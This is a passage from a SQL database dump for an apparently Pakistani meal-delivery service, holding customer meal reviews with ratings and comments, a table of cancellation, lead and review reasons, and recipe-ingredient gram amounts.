12:05:51',NULL),(341,100376,28,'meals','pending',1752,'',4.50,NULL,1,'2022-02-03 12:06:16','2022-02-03 12:06:16',NULL),(342,100393,28,'meals','pending',1752,'',4.50,NULL,1,'2022-02-08 15:29:48','2022-02-08 15:29:48',NULL),(343,100398,30,'meals','pending',1905,'',4.50,NULL,1,'2022-02-09 15:51:17','2022-02-09 15:51:17',NULL),(344,100333,28,'meals','pending',1905,'',4.50,NULL,1,'2022-02-10 03:19:45','2022-02-10 03:19:45',NULL),(345,100381,30,'meals','pending',1905,'send me alternative of this dish because i dont like it.',4.50,NULL,1,'2022-02-12 07:55:28','2022-02-12 07:55:28',NULL),(346,100398,30,'meals','pending',1905,'',1.00,NULL,1,'2022-02-12 07:56:15','2022-02-12 07:56:15',NULL),(347,100376,28,'meals','pending',1752,'',4.50,NULL,1,'2022-02-13 15:52:33','2022-02-13 15:52:33',NULL),(348,100414,28,'meals','pending',2012,'',3.50,NULL,1,'2022-02-13 16:05:43','2022-02-13 16:05:43',NULL),(349,100131,29,'meals','pending',2012,'',2.50,NULL,1,'2022-02-13 16:06:09','2022-02-13 16:06:09',NULL),(350,100176,30,'meals','pending',2012,'',1.00,NULL,1,'2022-02-13 16:06:28','2022-02-13 16:06:28',NULL),(351,100294,28,'meals','pending',1995,'Today\'s lunch was good and filling.',4.50,NULL,1,'2022-02-18 15:28:06','2022-02-18 15:28:06',NULL),(352,100249,30,'meals','pending',1655,'it was just chicken qeema tossed in cheese. Zero value for money.',2.00,NULL,1,'2022-02-20 10:43:36','2022-02-20 10:43:36',NULL),(353,100252,30,'meals','pending',1655,'I don’t understand how 2 beef Chapli kababs the size of roughly palm of one hand can be over 400 calories. ',2.00,NULL,1,'2022-02-20 10:44:54','2022-02-20 10:44:54',NULL),(354,100176,28,'meals','pending',2055,'',4.50,NULL,1,'2022-02-20 18:40:08','2022-02-20 18:40:08',NULL),(355,100286,28,'meals','pending',1995,'Banana pancakes were very tasty.',4.50,NULL,1,'2022-02-22 09:50:33','2022-02-22 09:50:33',NULL),(356,100426,30,'meals','pending',2051,'',4.50,NULL,1,'2022-02-22 19:30:31','2022-02-22 19:30:31',NULL),(357,100198,28,'meals','pending',2051,'',4.50,NULL,1,'2022-02-23 13:17:03','2022-02-23 13:17:03',NULL),(358,100433,28,'meals','pending',2051,'',4.50,NULL,1,'2022-02-26 08:36:05','2022-02-26 08:36:05',NULL),(359,100365,28,'meals','pending',2051,'',4.50,NULL,1,'2022-02-26 08:36:24','2022-02-26 08:36:24',NULL),(360,100381,28,'meals','pending',1752,'',4.50,NULL,1,'2022-03-07 14:21:08','2022-03-07 14:21:08',NULL),(361,100143,28,'meals','pending',1198,'',4.50,NULL,1,'2022-03-07 17:31:44','2022-03-07 17:31:44',NULL),(362,100418,28,'meals','pending',1198,'',4.50,NULL,1,'2022-03-07 17:32:10','2022-03-07 17:32:10',NULL),(363,100135,30,'meals','pending',1198,'dont like restaurant i dont like',4.50,NULL,1,'2022-03-07 17:33:03','2022-03-07 17:33:03',NULL),(364,100108,28,'meals','pending',1198,'i like so much i love it',4.50,NULL,1,'2022-03-07 17:33:30','2022-03-07 17:33:30',NULL),(365,100431,28,'meals','pending',1198,'good tast',4.50,NULL,1,'2022-03-07 17:34:58','2022-03-07 17:34:58',NULL),(366,100421,29,'meals','pending',1198,'food is smelling dont like plz removed this dish add sam shami kabab reshmi kabab ',4.50,NULL,1,'2022-03-07 17:40:01','2022-03-07 17:40:01',NULL),(367,100201,28,'meals','pending',2132,'',4.50,NULL,1,'2022-03-08 11:23:30','2022-03-08 11:23:30',NULL),(368,100343,28,'meals','pending',1144,'',4.50,NULL,1,'2022-03-13 14:30:52','2022-03-13 14:30:52',NULL),(369,100440,28,'meals','pending',1144,'',4.50,NULL,1,'2022-03-13 14:31:03','2022-03-13 14:31:03',NULL),(370,100370,28,'meals','pending',1144,'',4.50,NULL,1,'2022-03-13 14:31:32','2022-03-13 14:31:32',NULL),(371,100365,28,'meals','pending',1144,'',4.50,NULL,1,'2022-03-13 14:31:47','2022-03-13 14:31:47',NULL),(372,100436,28,'meals','pending',1144,'',4.50,NULL,1,'2022-03-13 14:32:00','2022-03-13 14:32:00',NULL),(373,100428,31,'meals','pending',2157,'',1.00,NULL,1,'2022-03-20 05:57:03','2022-03-20 05:57:03',NULL),(374,100196,31,'meals','pending',2157,'',1.50,NULL,1,'2022-03-20 06:02:27','2022-03-20 06:02:27',NULL),(375,100131,29,'meals','pending',2157,'',1.00,NULL,1,'2022-03-20 06:03:13','2022-03-20 06:03:13',NULL),(376,100154,30,'meals','pending',2248,'chicken omlet sandwich was tasteless ',4.50,NULL,1,'2022-03-28 14:05:06','2022-03-28 14:05:06',NULL),(377,100197,28,'meals','pending',2248,'yumylicious',4.50,NULL,1,'2022-03-28 18:21:49','2022-03-28 18:21:49',NULL),(378,100230,31,'meals','pending',1403,'thanks for ur cooperation in my weight losses INSHA ALLAH WE WILL CONTINUE AFTER EID .',4.50,NULL,1,'2022-04-04 00:15:19','2022-04-04 00:15:19',NULL),(379,100230,28,'meals','pending',2274,'',4.50,NULL,1,'2022-04-05 03:53:38','2022-04-05 03:53:38',NULL),(380,100486,28,'meals','pending',2308,'',4.00,NULL,1,'2022-04-12 03:25:44','2022-04-12 03:25:44',NULL),(381,100121,28,'meals','pending',2308,'',4.50,NULL,1,'2022-04-12 03:26:08','2022-04-12 03:26:08',NULL),(382,100486,28,'meals','pending',2274,'',4.50,NULL,1,'2022-04-12 03:32:10','2022-04-12 03:32:10',NULL),(383,100491,30,'meals','pending',2274,'',4.50,NULL,1,'2022-04-12 03:32:43','2022-04-12 03:32:43',NULL),(384,100420,28,'meals','pending',2274,'',4.50,NULL,1,'2022-04-12 03:32:55','2022-04-12 03:32:55',NULL),(385,100497,28,'meals','pending',2274,'',4.50,NULL,1,'2022-04-12 03:33:07','2022-04-12 03:33:07',NULL),(386,100503,28,'meals','pending',2011,'',4.50,NULL,1,'2022-04-16 19:34:14','2022-04-16 19:34:14',NULL),(387,100424,28,'meals','pending',2274,'',4.50,NULL,1,'2022-05-09 03:29:53','2022-05-09 03:29:53',NULL),(388,100143,29,'meals','pending',2386,'',4.50,NULL,1,'2022-05-13 09:53:29','2022-05-13 09:53:29',NULL),(389,100196,31,'meals','pending',2434,'',4.50,NULL,1,'2022-05-20 08:04:57','2022-05-20 08:04:57',NULL),(390,100420,28,'meals','pending',3,'ghj',4.50,NULL,1,'2022-05-25 21:19:30','2022-05-25 21:19:30',NULL),(391,100504,30,'meals','pending',409,'',4.50,NULL,1,'2022-06-02 09:25:08','2022-06-02 09:25:08',NULL),(392,100413,30,'meals','pending',409,'',4.50,NULL,1,'2022-06-02 09:26:14','2022-06-02 09:26:14',NULL),(393,100286,30,'meals','pending',2274,'kindly plz change my breakfast menu i dont like ',1.00,NULL,1,'2022-06-10 12:38:36','2022-06-10 12:38:36',NULL),(394,100434,30,'meals','pending',2274,'kindly pLz change breakfast menu thanks ',1.00,NULL,1,'2022-06-12 11:34:42','2022-06-12 11:34:42',NULL),(395,100531,28,'meals','pending',2585,'',4.50,NULL,1,'2022-07-08 19:42:24','2022-07-08 19:42:24',NULL),(396,100534,31,'meals','pending',2539,'i would like it less saucier... too much sauce for me... and steak was quite dry ',2.50,NULL,1,'2022-07-30 04:47:44','2022-07-30 04:47:44',NULL),(397,100441,31,'meals','pending',2539,'there was no nuts in the snacks only coffee',4.50,NULL,1,'2022-07-30 04:48:30','2022-07-30 04:48:30',NULL),(398,100418,30,'meals','pending',2539,'also it feels like it was spoiled',1.00,NULL,1,'2022-07-30 10:41:06','2022-07-30 10:41:06',NULL),(399,100374,31,'meals','pending',2278,'you have counted dry fruit in calories count but we are not receiving dry fruit every day',4.50,NULL,1,'2022-08-05 17:11:34','2022-08-05 17:11:34',NULL),(400,100343,30,'meals','pending',2539,'',1.00,NULL,1,'2022-08-09 09:56:10','2022-08-09 09:56:10',NULL),(401,100294,30,'meals','pending',2539,'',1.00,NULL,1,'2022-08-09 15:53:37','2022-08-09 15:53:37',NULL),(402,100533,30,'meals','pending',2539,'',1.00,NULL,1,'2022-08-09 15:53:52','2022-08-09 15:53:52',NULL),(403,100500,31,'meals','pending',2539,'',1.00,NULL,1,'2022-08-10 12:23:42','2022-08-10 12:23:42',NULL),(404,100273,28,'meals','pending',2669,'',4.50,NULL,1,'2022-08-17 00:24:04','2022-08-17 00:24:04',NULL),(405,100527,28,'meals','pending',2669,'',4.50,NULL,1,'2022-08-17 00:24:12','2022-08-17 00:24:12',NULL),(406,100299,30,'meals','pending',2669,'',4.50,NULL,1,'2022-08-17 11:49:44','2022-08-17 11:49:44',NULL),(407,100515,30,'meals','pending',2669,'',4.50,NULL,1,'2022-08-20 18:30:59','2022-08-20 18:30:59',NULL),(408,100366,30,'meals','pending',2669,'',4.50,NULL,1,'2022-08-20 18:31:32','2022-08-20 18:31:32',NULL),(409,100523,30,'meals','pending',2669,'',4.50,NULL,1,'2022-08-20 18:31:42','2022-08-20 18:31:42',NULL),(410,100522,28,'meals','pending',2669,'',4.50,NULL,1,'2022-08-20 18:31:55','2022-08-20 18:31:55',NULL),(411,100516,30,'meals','pending',2669,'',4.50,NULL,1,'2022-08-20 18:32:04','2022-08-20 18:32:04',NULL),(412,100244,30,'meals','pending',2669,'',4.50,NULL,1,'2022-08-20 18:32:16','2022-08-20 18:32:16',NULL),(413,100299,30,'meals','pending',2669,'',4.50,NULL,1,'2022-08-20 18:32:31','2022-08-20 18:32:31',NULL),(414,100527,30,'meals','pending',2669,'',4.50,NULL,1,'2022-08-20 18:32:41','2022-08-20 18:32:41',NULL),(415,100513,28,'meals','pending',2669,'',4.50,NULL,1,'2022-08-20 18:32:48','2022-08-20 18:32:48',NULL),(416,100512,30,'meals','pending',2669,'',4.50,NULL,1,'2022-08-20 18:32:57','2022-08-20 18:32:57',NULL),(417,100266,30,'meals','pending',2669,'',4.50,NULL,1,'2022-08-20 18:33:04','2022-08-20 18:33:04',NULL),(418,100254,30,'meals','pending',2669,'',4.50,NULL,1,'2022-08-22 16:26:32','2022-08-22 16:26:32',NULL),(419,100255,28,'meals','pending',2669,'',4.50,NULL,1,'2022-08-22 16:26:53','2022-08-22 16:26:53',NULL),(420,100346,30,'meals','pending',2669,'',4.50,NULL,1,'2022-08-22 16:27:03','2022-08-22 16:27:03',NULL),(421,100519,28,'meals','pending',2669,'',4.50,NULL,1,'2022-08-22 16:27:11','2022-08-22 16:27:11',NULL),(422,100286,30,'meals','pending',2274,'plz change ',1.00,NULL,1,'2022-08-24 08:15:23','2022-08-24 08:15:23',NULL),(423,100189,31,'meals','pending',2646,'The taste was not very good.',3.00,NULL,1,'2022-08-25 08:45:50','2022-08-25 08:45:50',NULL),(424,100189,31,'meals','pending',2646,'The taste was not very good.',3.00,NULL,1,'2022-08-25 08:46:22','2022-08-25 08:46:22',NULL),(425,100441,31,'meals','pending',2646,'I am allergic to peanuts, don\'t add peanuts in my coffee',4.00,NULL,1,'2022-08-26 05:58:15','2022-08-26 05:58:15',NULL),(426,100414,31,'meals','pending',2646,'Don\'t add raw cabbage onion or tomatoes in my meal',4.00,NULL,1,'2022-08-26 05:59:42','2022-08-26 05:59:42',NULL),(427,100417,31,'meals','pending',2646,'please add a little salt and black pepper in it',4.50,NULL,1,'2022-08-27 08:42:28','2022-08-27 08:42:28',NULL),(428,100490,28,'meals','pending',2646,'',4.50,NULL,1,'2022-08-27 08:42:46','2022-08-27 08:42:46',NULL),(429,100414,28,'meals','pending',2646,'',4.50,NULL,1,'2022-08-27 08:43:07','2022-08-27 08:43:07',NULL),(430,100371,30,'meals','pending',2669,'',4.50,NULL,1,'2022-08-27 18:47:38','2022-08-27 18:47:38',NULL),(431,100524,28,'meals','pending',2669,'',4.50,NULL,1,'2022-08-27 18:47:48','2022-08-27 18:47:48',NULL),(432,100282,28,'meals','pending',2669,'',4.50,NULL,1,'2022-08-27 18:47:56','2022-08-27 18:47:56',NULL),(433,100517,30,'meals','pending',2669,'',4.50,NULL,1,'2022-08-27 18:48:03','2022-08-27 18:48:03',NULL),(434,100436,28,'meals','pending',2646,'',4.50,NULL,1,'2022-08-29 06:22:45','2022-08-29 06:22:45',NULL),(435,100138,31,'meals','pending',2646,'haven\'t received this ',1.00,NULL,1,'2022-08-29 06:24:16','2022-08-29 06:24:16',NULL),(436,100143,28,'meals','pending',2646,'Taste was good but size of patty was not enough ',4.50,NULL,1,'2022-08-29 06:25:24','2022-08-29 06:25:24',NULL),(437,100422,30,'meals','pending',2646,'taste was not good',4.50,NULL,1,'2022-08-29 06:25:55','2022-08-29 06:25:55',NULL),(438,100490,28,'meals','pending',2646,'taste was very good and quantity too.',4.50,NULL,1,'2022-08-29 06:26:35','2022-08-29 06:26:35',NULL),(439,100507,28,'meals','pending',2646,'taste was good',4.50,NULL,1,'2022-08-30 10:17:45','2022-08-30 10:17:45',NULL),(440,100434,30,'meals','pending',2274,'plz change i don\'t like it ',4.50,NULL,1,'2022-09-20 08:27:42','2022-09-20 08:27:42',NULL),(441,100427,30,'meals','pending',2851,'',4.50,NULL,1,'2022-10-05 20:06:55','2022-10-05 20:06:55',NULL),(442,100482,31,'meals','pending',2922,'recipe ??',4.50,NULL,1,'2022-10-19 04:29:18','2022-10-19 04:29:18',NULL),(443,100453,31,'meals','pending',2923,'',4.50,NULL,1,'2022-10-19 06:24:09','2022-10-19 06:24:09',NULL),(444,100566,28,'meals','pending',2930,'',4.50,NULL,1,'2022-10-23 20:21:25','2022-10-23 20:21:25',NULL),(445,100490,30,'meals','pending',2938,'',4.50,NULL,1,'2022-10-25 19:08:43','2022-10-25 19:08:43',NULL),(446,100534,28,'meals','pending',2938,'',4.50,NULL,1,'2022-10-27 00:29:38','2022-10-27 00:29:38',NULL),(447,100565,28,'meals','pending',2909,'loved it! would like to have it again',4.50,NULL,1,'2022-10-29 14:26:46','2022-10-29 14:26:46',NULL),(448,100562,29,'meals','pending',2909,'the pieces were dry and coating was completely off when it came to me. also had green spots on the back',4.50,NULL,1,'2022-10-29 14:27:39','2022-10-29 14:27:39',NULL),(449,100436,30,'meals','pending',199,'Please send alternative ',4.50,NULL,1,'2022-11-24 14:36:49','2022-11-24 14:36:49',NULL),(450,100508,28,'meals','pending',199,'',5.00,NULL,1,'2022-11-24 15:09:36','2022-11-24 15:09:36',NULL),(451,100559,28,'meals','pending',3119,'',4.50,NULL,1,'2022-12-01 10:44:43','2022-12-01 10:44:43',NULL),(452,100265,28,'meals','pending',3216,'',4.50,NULL,1,'2022-12-28 16:11:47','2022-12-28 16:11:47',NULL),(453,100225,31,'meals','pending',3216,'I didn\'t get the salad. ',1.00,NULL,1,'2022-12-31 07:58:29','2022-12-31 07:58:29',NULL),(454,100254,30,'meals','pending',3216,'it was chicken cheese ball, couldn\'t eat due to cheddar cheese combination with chicken.',4.50,NULL,1,'2023-01-03 10:24:34','2023-01-03 10:24:34',NULL),(455,100254,30,'meals','pending',3216,'it was chicken cheese ball, couldn\'t eat due to cheddar cheese combination with chicken.',1.00,NULL,1,'2023-01-03 10:24:43','2023-01-03 10:24:43',NULL),(456,100259,30,'meals','pending',3216,'didn\'t like the cream cheese combination with egg and boiled chicken',1.00,NULL,1,'2023-01-03 10:25:33','2023-01-03 10:25:33',NULL),(457,100515,29,'meals','pending',3216,'the food felt spoiled, couldn\'t eat',1.00,NULL,1,'2023-01-03 10:27:20','2023-01-03 10:27:20',NULL),(458,100252,28,'meals','pending',3216,'excellent and week balanced',5.00,NULL,1,'2023-01-03 10:27:40','2023-01-03 10:27:40',NULL),(459,100548,30,'meals','pending',3316,'I dont want any beef or meat as it always comes half cooked from you and I throw it away. please remove beef meat from my menue. thanks ',4.50,NULL,1,'2023-01-27 05:26:06','2023-01-27 05:26:06',NULL);

--
-- Table structure for table `reasons`
--

CREATE TABLE `reasons` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `parent` enum('RECIPES','MEALS','MEMBER_MEAL_SERVE_CANCEL','MEMBER_MEAL_SERVE_DECLINE','MEMBER_MEAL_SERVE_CONFIRM','COMPLAINS','member_reservations','lost','leads') COLLATE utf8mb4_unicode_ci NOT NULL,
  `child` varchar(45) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `active` tinyint(1) NOT NULL DEFAULT '1',
  `deleted_at` timestamp NULL DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=32 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `reasons`
--

INSERT INTO `reasons` VALUES (1,'member_reservations','cooking','Meal is on Cook',1,NULL,NULL,NULL),(3,'member_reservations','intransit','Meal is on Transit',1,NULL,NULL,NULL),(4,'member_reservations','canceled','Allergic to this food',1,NULL,NULL,NULL),(5,'member_reservations','canceled','Don’t like this Meal',1,NULL,NULL,NULL),(6,'member_reservations','canceled','Not available',1,NULL,NULL,NULL),(7,'member_reservations','decline','Meal stink',1,NULL,NULL,NULL),(8,'member_reservations','decline','Customer is not Answering',1,NULL,NULL,NULL),(10,'member_reservations','decline','Doorstep rejected',1,NULL,NULL,NULL),(11,'member_reservations','lost','Meal Lost',1,NULL,NULL,NULL),(12,'member_reservations','lost','Kitchen Mistake',1,NULL,NULL,NULL),(13,'member_reservations','lost','Accident',1,NULL,NULL,NULL),(14,'leads','converted','Converted to Package',1,NULL,NULL,NULL),(15,'leads','notInterested','Expensive',1,NULL,NULL,NULL),(16,'leads','notInterested','Out of the Reach',1,NULL,NULL,NULL),(17,'leads','notInterested','Don\'t like Plans',1,NULL,NULL,NULL),(18,'leads','notResponding','Number Busy',1,NULL,NULL,NULL),(19,'leads','notResponding','Number Off',1,NULL,NULL,NULL),(20,'leads','notResponding','Call not picking',1,NULL,NULL,NULL),(21,'leads','notResponding','3rd Attempt Failed',1,NULL,NULL,NULL),(22,'leads','callBack','Customer wants to call back',1,NULL,NULL,NULL),(23,'leads','callBack','Let us Know',1,NULL,NULL,NULL),(24,'leads','notInterested','Calories not suited',1,NULL,NULL,NULL),(25,'leads','callBack','Nutritionist Required',1,NULL,NULL,NULL),(26,'leads','callBack','Collaboration Required',1,NULL,NULL,NULL),(27,'leads','converted','Converted to Single Day Meal',1,NULL,NULL,NULL),(28,'MEALS','review','Food was Excellent',1,NULL,NULL,NULL),(29,'MEALS','review','Food was Spoiled',1,NULL,NULL,NULL),(30,'MEALS','review','I don\'t Like this Food',1,NULL,NULL,NULL),(31,'MEALS','review','Other',1,NULL,NULL,NULL);

--
-- Table structure for table `recipe_ingredients`
--

CREATE TABLE `recipe_ingredients` (
  `recipe_id` int(10) unsigned NOT NULL,
  `ingredient_id` int(10) unsigned NOT NULL,
  `instruction` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `grams` int(11) DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  KEY `recipe_ingredients_recipe_id_foreign` (`recipe_id`),
  KEY `recipe_ingredients_ingredient_id_foreign` (`ingredient_id`),
  KEY `recipe_ingredients_recipe_id` (`recipe_id`),
  KEY `recipe_ingredients_ingredient_id` (`ingredient_id`),
  CONSTRAINT `recipe_ingredients_ingredient_id_foreign` FOREIGN KEY (`ingredient_id`) REFERENCES `ingredients` (`id`) ON DELETE CASCADE,
  CONSTRAINT `recipe_ingredients_recipe_id_foreign` FOREIGN KEY (`recipe_id`) REFERENCES `recipes` (`id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `recipe_ingredients`
--

INSERT INTO `recipe_ingredients` VALUES (1,24,NULL,50,NULL,NULL),(1,5,NULL,20,NULL,NULL),(1,13,NULL,120,NULL,NULL),(1,17,NULL,15,NULL,NULL),(1,30,NULL,125,NULL,NULL),(2,21,NULL,200,NULL,NULL),(2,10,NULL,80,NULL,NULL),(2,35,NULL,120,NULL,NULL),(3,70,NULL,120,NULL,NULL),(3,49,NULL,20,NULL,NULL),(4,53,NULL,250,NULL,NULL),(5,57,NULL,100,NULL,NULL),(5,11,NULL,80,NULL,NULL),(5,24,NULL,70,NULL,NULL),(6,18,NULL,200,NULL,NULL),(7,10,NULL,110,NULL,NULL),(7,63,NULL,104,NULL,NULL),(8,39,NULL,250,NULL,NULL),(9,16,NULL,400,NULL,NULL),(10,2,NULL,12,NULL,NULL),(10,131,NULL,12,NULL,NULL),(11,109,NULL,50,NULL,NULL),(12,82,NULL,10,NULL,NULL),(13,109,NULL,100,NULL,NULL),(14,109,NULL,100,NULL,NULL),(15,109,NULL,100,NULL,NULL),(16,91,NULL,10,NULL,NULL),(17,109,NULL,50,NULL,NULL),(18,150,NULL,8,NULL,NULL),(21,101,NULL,100,NULL,NULL),(22,101,NULL,110,NULL,NULL),(23,29,NULL,50,NULL,NULL),(24,75,NULL,120,NULL,NULL),(25,109,NULL,50,NULL,NULL),(26,16,NULL,80,NULL,NULL),(26,156,NULL,15,NULL,NULL),(26,108,NULL,2,NULL,NULL),(26,82,NULL,20,NULL,NULL),(26,52,NULL,3,NULL,NULL),(26,158,NULL,30,NULL,NULL),(26,157,NULL,3,NULL,NULL),(27,109,NULL,100,NULL,NULL),(28,16,NULL,80,NULL,NULL),(28,148,NULL,4,NULL,NULL),(28,156,NULL,4,NULL,NULL),(28,109,NULL,1,NULL,NULL),(28,90,NULL,10,NULL,NULL),(28,108,NULL,2,NULL,NULL),(28,102,NULL,10,NULL,NULL),(29,109,NULL,100,NULL,NULL),(30,109,NULL,50,NULL,NULL),(31,50,NULL,20,NULL,NULL),(32,148,NULL,4,NULL,NULL),(33,148,NULL,4,NULL,NULL),(34,101,NULL,120,NULL,NULL),(35,59,NULL,15,NULL,NULL),(35,93,NULL,30,NULL,NULL),(35,50,NULL,30,NULL,NULL),(35,109,NULL,1,NULL,NULL),(35,96,NULL,4,NULL,NULL),(36,93,NULL,50,NULL,NULL),(37,6,NULL,2,NULL,NULL),(37,148,NULL,4,NULL,NULL),(37,101,NULL,100,NULL,NULL),(37,75,NULL,150,NULL,NULL),(37,23,NULL,30,NULL,NULL),(37,50,NULL,30,NULL,NULL),(37,109,NULL,1,NULL,NULL),(37,151,NULL,4,NULL,NULL),(38,148,NULL,4,NULL,NULL),(39,101,NULL,130,NULL,NULL),(41,95,NULL,180,NULL,NULL),(42,101,NULL,200,NULL,NULL),(45,163,NULL,200,NULL,NULL),(45,102,NULL,20,NULL,NULL),(45,148,NULL,4,NULL,NULL),(46,171,NULL,10,NULL,NULL),(47,86,NULL,60,NULL,NULL),(48,101,NULL,140,NULL,NULL),(49,93,NULL,30,NULL,NULL),(49,95,NULL,130,NULL,NULL),(49,148,NULL,4,NULL,NULL),(49,17,NULL,4,NULL,NULL),(49,52,NULL,25,NULL,NULL),(49,135,NULL,15,NULL,NULL),(49,59,NULL,30,NULL,NULL),(49,180,NULL,2,NULL,NULL),(49,156,NULL,5,NULL,NULL),(49,21,NULL,30,NULL,NULL),(50,109,NULL,25,NULL,NULL),(51,121,NULL,100,NULL,NULL),(53,184,NULL,50,NULL,NULL),(54,86,NULL,30,NULL,NULL),(54,50,NULL,30,NULL,NULL),(54,149,NULL,90,NULL,NULL),(54,182,NULL,15,NULL,NULL),(54,178,NULL,5,NULL,NULL),(54,16,NULL,10,NULL,NULL),(54,181,NULL,1,NULL,NULL),(55,91,NULL,20,NULL,NULL),(55,52,NULL,20,NULL,NULL),(55,77,NULL,150,NULL,NULL),(55,181,NULL,1,NULL,NULL),(55,185,NULL,30,NULL,NULL),(55,148,NULL,4,NULL,NULL),(56,52,NULL,30,NULL,NULL),(57,101,NULL,80,NULL,NULL),(58,52,NULL,10,NULL,NULL),(59,181,NULL,1,NULL,NULL),(59,106,NULL,20,NULL,NULL),(59,91,NULL,15,NULL,NULL),(59,74,NULL,50,NULL,NULL),(59,50,NULL,15,NULL,NULL),(59,101,NULL,80,NULL,NULL),(59,42,NULL,1,NULL,NULL),(59,180,NULL,1,NULL,NULL),(59,96,NULL,8,NULL,NULL),(59,111,NULL,8,NULL,NULL),(59,148,NULL,4,NULL,NULL),(60,109,NULL,2,NULL,NULL),(60,148,NULL,4,NULL,NULL),(60,101,NULL,80,NULL,NULL),(60,99,NULL,1,NULL,NULL),(60,135,NULL,15,NULL,NULL),(60,93,NULL,30,NULL,NULL),(61,86,NULL,30,NULL,NULL),(62,108,NULL,60,NULL,NULL),(63,108,NULL,60,NULL,NULL),(64,121,NULL,90,NULL,NULL),(65,186,NULL,30,NULL,NULL),(66,93,NULL,40,NULL,NULL),(67,101,NULL,80,NULL,NULL),(68,101,NULL,80,NULL,NULL),(68,62,NULL,30,NULL,NULL),(68,191,NULL,30,NULL,NULL),(68,90,NULL,30,NULL,NULL),(68,50,NULL,40,NULL,NULL),(68,148,NULL,5,NULL,NULL),(68,190,NULL,5,NULL,NULL),(68,117,NULL,5,NULL,NULL),(68,96,NULL,3,NULL,NULL),(68,6,NULL,5,NULL,NULL),(69,77,NULL,60,NULL,NULL),(69,61,NULL,80,NULL,NULL),(69,52,NULL,39,NULL,NULL),(69,133,NULL,30,NULL,NULL),(69,2,NULL,20,NULL,NULL),(69,192,NULL,5,NULL,NULL),(69,148,NULL,5,NULL,NULL),(69,117,NULL,5,NULL,NULL),(70,93,NULL,30,NULL,NULL),(70,52,NULL,30,NULL,NULL),(70,191,NULL,30,NULL,NULL),(70,86,NULL,30,NULL,NULL),(70,193,NULL,60,NULL,NULL),(70,189,NULL,15,NULL,NULL),(70,133,NULL,8,NULL,NULL),(70,165,NULL,15,NULL,NULL),(70,148,NULL,5,NULL,NULL),(71,75,NULL,50,NULL,NULL),(72,163,NULL,150,NULL,NULL),(72,151,NULL,5,NULL,NULL),(72,111,NULL,30,NULL,NULL),(72,98,NULL,15,NULL,NULL),(72,148,NULL,5,NULL,NULL),(73,109,NULL,2,NULL,NULL),(12,52,NULL,10,NULL,NULL),(12,50,NULL,10,NULL,NULL),(12,91,NULL,10,NULL,NULL),(12,109,NULL,100,NULL,NULL),(12,148,NULL,4,NULL,NULL),(12,108,NULL,60,NULL,NULL),(14,77,NULL,150,NULL,NULL),(14,148,NULL,4,NULL,NULL),(14,108,NULL,60,NULL,NULL),(74,109,NULL,100,NULL,NULL),(74,108,NULL,60,NULL,NULL),(74,101,NULL,80,NULL,NULL),(74,52,NULL,20,NULL,NULL),(74,82,NULL,20,NULL,NULL),(74,148,NULL,4,NULL,NULL),(75,109,NULL,100,NULL,NULL),(76,109,NULL,100,NULL,NULL),(77,101,NULL,50,NULL,NULL),(76,108,NULL,60,NULL,NULL),(76,148,NULL,4,NULL,NULL),(78,86,NULL,100,NULL,NULL),(79,128,NULL,50,NULL,NULL),(80,101,NULL,50,NULL,NULL),(80,21,NULL,15,NULL,NULL),(80,104,NULL,8,NULL,NULL),(80,109,NULL,25,NULL,NULL),(81,109,NULL,100,NULL,NULL),(82,93,NULL,30,NULL,NULL),(83,119,NULL,5,NULL,NULL),(84,29,NULL,50,NULL,NULL),(85,101,NULL,130,NULL,NULL),(86,101,NULL,60,NULL,NULL),(87,109,NULL,25,NULL,NULL),(89,199,NULL,7,NULL,NULL),(56,101,NULL,100,NULL,NULL),(56,99,NULL,3,NULL,NULL),(56,135,NULL,15,NULL,NULL),(56,82,NULL,20,NULL,NULL),(56,181,NULL,1,NULL,NULL),(56,102,NULL,20,NULL,NULL),(56,155,NULL,5,NULL,NULL),(56,132,NULL,15,NULL,NULL),(56,148,NULL,5,NULL,NULL),(90,39,NULL,70,NULL,NULL),(91,86,NULL,20,NULL,NULL),(90,201,NULL,15,NULL,NULL),(90,196,NULL,15,NULL,NULL),(90,128,NULL,30,NULL,NULL),(90,117,NULL,15,NULL,NULL),(90,2,NULL,5,NULL,NULL),(90,5,NULL,5,NULL,NULL),(90,129,NULL,10,NULL,NULL),(62,186,NULL,30,NULL,NULL),(62,50,NULL,50,NULL,NULL),(62,109,NULL,50,NULL,NULL),(21,91,NULL,15,NULL,NULL),(21,50,NULL,20,NULL,NULL),(21,74,NULL,30,NULL,NULL),(21,106,NULL,40,NULL,NULL),(21,151,NULL,8,NULL,NULL),(21,111,NULL,8,NULL,NULL),(21,52,NULL,20,NULL,NULL),(21,148,NULL,5,NULL,NULL),(15,101,NULL,100,NULL,NULL),(15,148,NULL,4,NULL,NULL),(15,82,NULL,20,NULL,NULL),(15,91,NULL,20,NULL,NULL),(15,50,NULL,20,NULL,NULL),(15,52,NULL,20,NULL,NULL),(25,101,NULL,70,NULL,NULL),(25,148,NULL,10,NULL,NULL),(25,91,NULL,15,NULL,NULL),(25,93,NULL,20,NULL,NULL),(25,135,NULL,15,NULL,NULL),(25,52,NULL,20,NULL,NULL),(92,93,NULL,20,NULL,NULL),(93,202,NULL,15,NULL,NULL),(94,109,NULL,150,NULL,NULL),(95,29,NULL,90,NULL,NULL),(93,109,NULL,75,NULL,NULL),(93,94,NULL,15,NULL,NULL),(93,117,NULL,15,NULL,NULL),(93,122,NULL,10,NULL,NULL),(93,123,NULL,10,NULL,NULL),(96,109,NULL,50,NULL,NULL),(97,19,NULL,50,NULL,NULL),(98,109,NULL,40,NULL,NULL),(73,52,NULL,20,NULL,NULL),(73,82,NULL,20,NULL,NULL),(73,148,NULL,5,NULL,NULL),(73,108,NULL,2,NULL,NULL),(19,101,NULL,150,NULL,NULL),(32,101,NULL,70,NULL,NULL),(32,93,NULL,50,NULL,NULL),(32,52,NULL,20,NULL,NULL),(32,82,NULL,20,NU